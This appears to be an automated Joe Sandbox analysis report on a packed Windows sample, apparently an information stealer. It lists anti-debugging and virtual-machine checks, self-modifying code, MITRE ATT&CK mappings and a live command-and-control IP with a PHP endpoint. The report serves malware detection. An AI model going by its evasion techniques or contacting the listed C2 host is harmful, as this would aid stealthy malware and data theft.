                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8947E1 second address: 8947E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89493A second address: 894946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jc 00007FECB125BFC6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894946 second address: 89497B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FECB0CC2D06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FECB0CC2D15h 0x00000013 jmp 00007FECB0CC2D12h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0C12 second address: 8A0C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A0C16 second address: 8A0C71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D14h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FECB0CC2D22h 0x00000011 jmp 00007FECB0CC2D16h 0x00000016 jns 00007FECB0CC2D06h 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007FECB0CC2D0Ah 0x00000023 push edi 0x00000024 jmp 00007FECB0CC2D10h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A78FD second address: 8A7901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7901 second address: 8A7946 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FECB0CC2D19h 0x00000010 jmp 00007FECB0CC2D13h 0x00000015 jmp 00007FECB0CC2D19h 0x0000001a push ecx 0x0000001b jnc 00007FECB0CC2D06h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC289 second address: 8AC295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FECB125BFC6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B796A second address: 8B7987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D19h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7987 second address: 8B79D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FECB125BFCAh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 jmp 00007FECB125BFD4h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 jmp 00007FECB125BFD5h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B79D1 second address: 8B79F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FECB0CC2D0Dh 0x0000000b jmp 00007FECB0CC2D13h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9EED second address: 8B9F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FECB125BFD3h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE5BF second address: 8BE5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FECB0CC2D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE5CB second address: 8BE5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE5CF second address: 8BE5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2ACE second address: 8C2AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2AD8 second address: 8C2ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2ADC second address: 8C2AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FECB125BFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2AE8 second address: 8C2B07 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FECB0CC2D0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FECB0CC2D0Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2B07 second address: 8C2B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FECB125BFD3h 0x00000010 jmp 00007FECB125BFD1h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CA9 second address: 8C2CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CAF second address: 8C2CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CBC second address: 8C2CDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECB0CC2D0Bh 0x00000007 jmp 00007FECB0CC2D14h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CDF second address: 8C2CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CE5 second address: 8C2CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2CEB second address: 8C2CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jno 00007FECB125BFC6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2E81 second address: 8C2E92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FECB0CC2D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C32AA second address: 8C32B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FECB125BFC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3425 second address: 8C3438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FECB0CC2D06h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3F60 second address: 8C3F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3F65 second address: 8C3F6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6E99 second address: 8C6E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6E9D second address: 8C6EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jnp 00007FECB0CC2D06h 0x00000012 jmp 00007FECB0CC2D0Bh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2493 second address: 8E249F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FECB125BFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E43B1 second address: 8E43BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FECB0CC2D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E43BB second address: 8E43C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7359 second address: 8E735D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4FFD second address: 8F5002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F519A second address: 8F519E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F519E second address: 8F51A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F51A4 second address: 8F51AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F5B4D second address: 8F5B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F5B51 second address: 8F5B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F5CD4 second address: 8F5CE8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FECB125BFC6h 0x00000008 jng 00007FECB125BFC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F5CE8 second address: 8F5CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8F5CEE second address: 8F5CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FA343 second address: 8FA348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5180282 second address: 51802D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 1Eh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, 2294AE25h 0x0000000f jmp 00007FECB125BFD2h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FECB125BFCDh 0x0000001f add esi, 19A95726h 0x00000025 jmp 00007FECB125BFD1h 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51802D0 second address: 51802D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51802D5 second address: 51802E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECB125BFCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51802E3 second address: 51802F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51802F2 second address: 51802FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51803D3 second address: 51803D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51803D7 second address: 51803DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8195EA second address: 8195F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8195F0 second address: 8195F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 661A5C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 897703 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401160 GetSystemInfo,ExitProcess
Source: file.exe, 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2133647068.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133647068.00000000012B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2133647068.00000000012E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWc
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13667
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13664
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13718
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13686
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13678
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 4788, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4788, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4788, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (matched techniques; the number in parentheses is the count of matching signatures)

Tactic               | Matched techniques
Execution            | Command and Scripting Interpreter (2); Native API (11)
Persistence          | DLL Side-Loading (1)
Privilege Escalation | Process Injection (11); DLL Side-Loading (1)
Defense Evasion      | Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Discovery            | System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Collection           | Archive Collected Data (1)
Command and Control  | Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12)

No techniques matched under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Antivirus, Machine Learning and Genetic Malware Detection

Source   | Detection | Scanner         | Label
file.exe | 100%      | Avira           | TR/Crypt.TPM.Gen
file.exe | 100%      | Joe Sandbox ML  |

No Antivirus matches for dropped files, unpacked PE files or domains.

Source                                         | Detection | Scanner        | Label
http://185.215.113.37/                         | 100%      | URL Reputation | malware
http://185.215.113.37                          | 100%      | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php     | 100%      | URL Reputation | malware

No contacted domains info

Contacted URLs

Name                                        | Malicious | Antivirus Detection     | Reputation
http://185.215.113.37/                      | true      | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php  | true      | URL Reputation: malware | unknown

URLs from Memory and Binaries

Name                                          | Source                                                                                   | Malicious | Antivirus Detection     | Reputation
http://185.215.113.37/?                       | file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | true      |                         | unknown
http://185.215.113.37/e2b1563c6670f193.phpR   | file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | true      |                         | unknown
http://185.215.113.37/e2b1563c6670f193.phpb   | file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | true      |                         | unknown
http://185.215.113.37/e2b1563c6670f193.php1   | file.exe, 00000000.00000002.2133647068.00000000012C7000.00000004.00000020.00020000.00000000.sdmp | true      |                         | unknown
http://185.215.113.37                         | file.exe, 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp | true      | URL Reputation: malware | unknown

Contacted IPs

IP             | Domain  | Country  | ASN    | ASN Name               | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
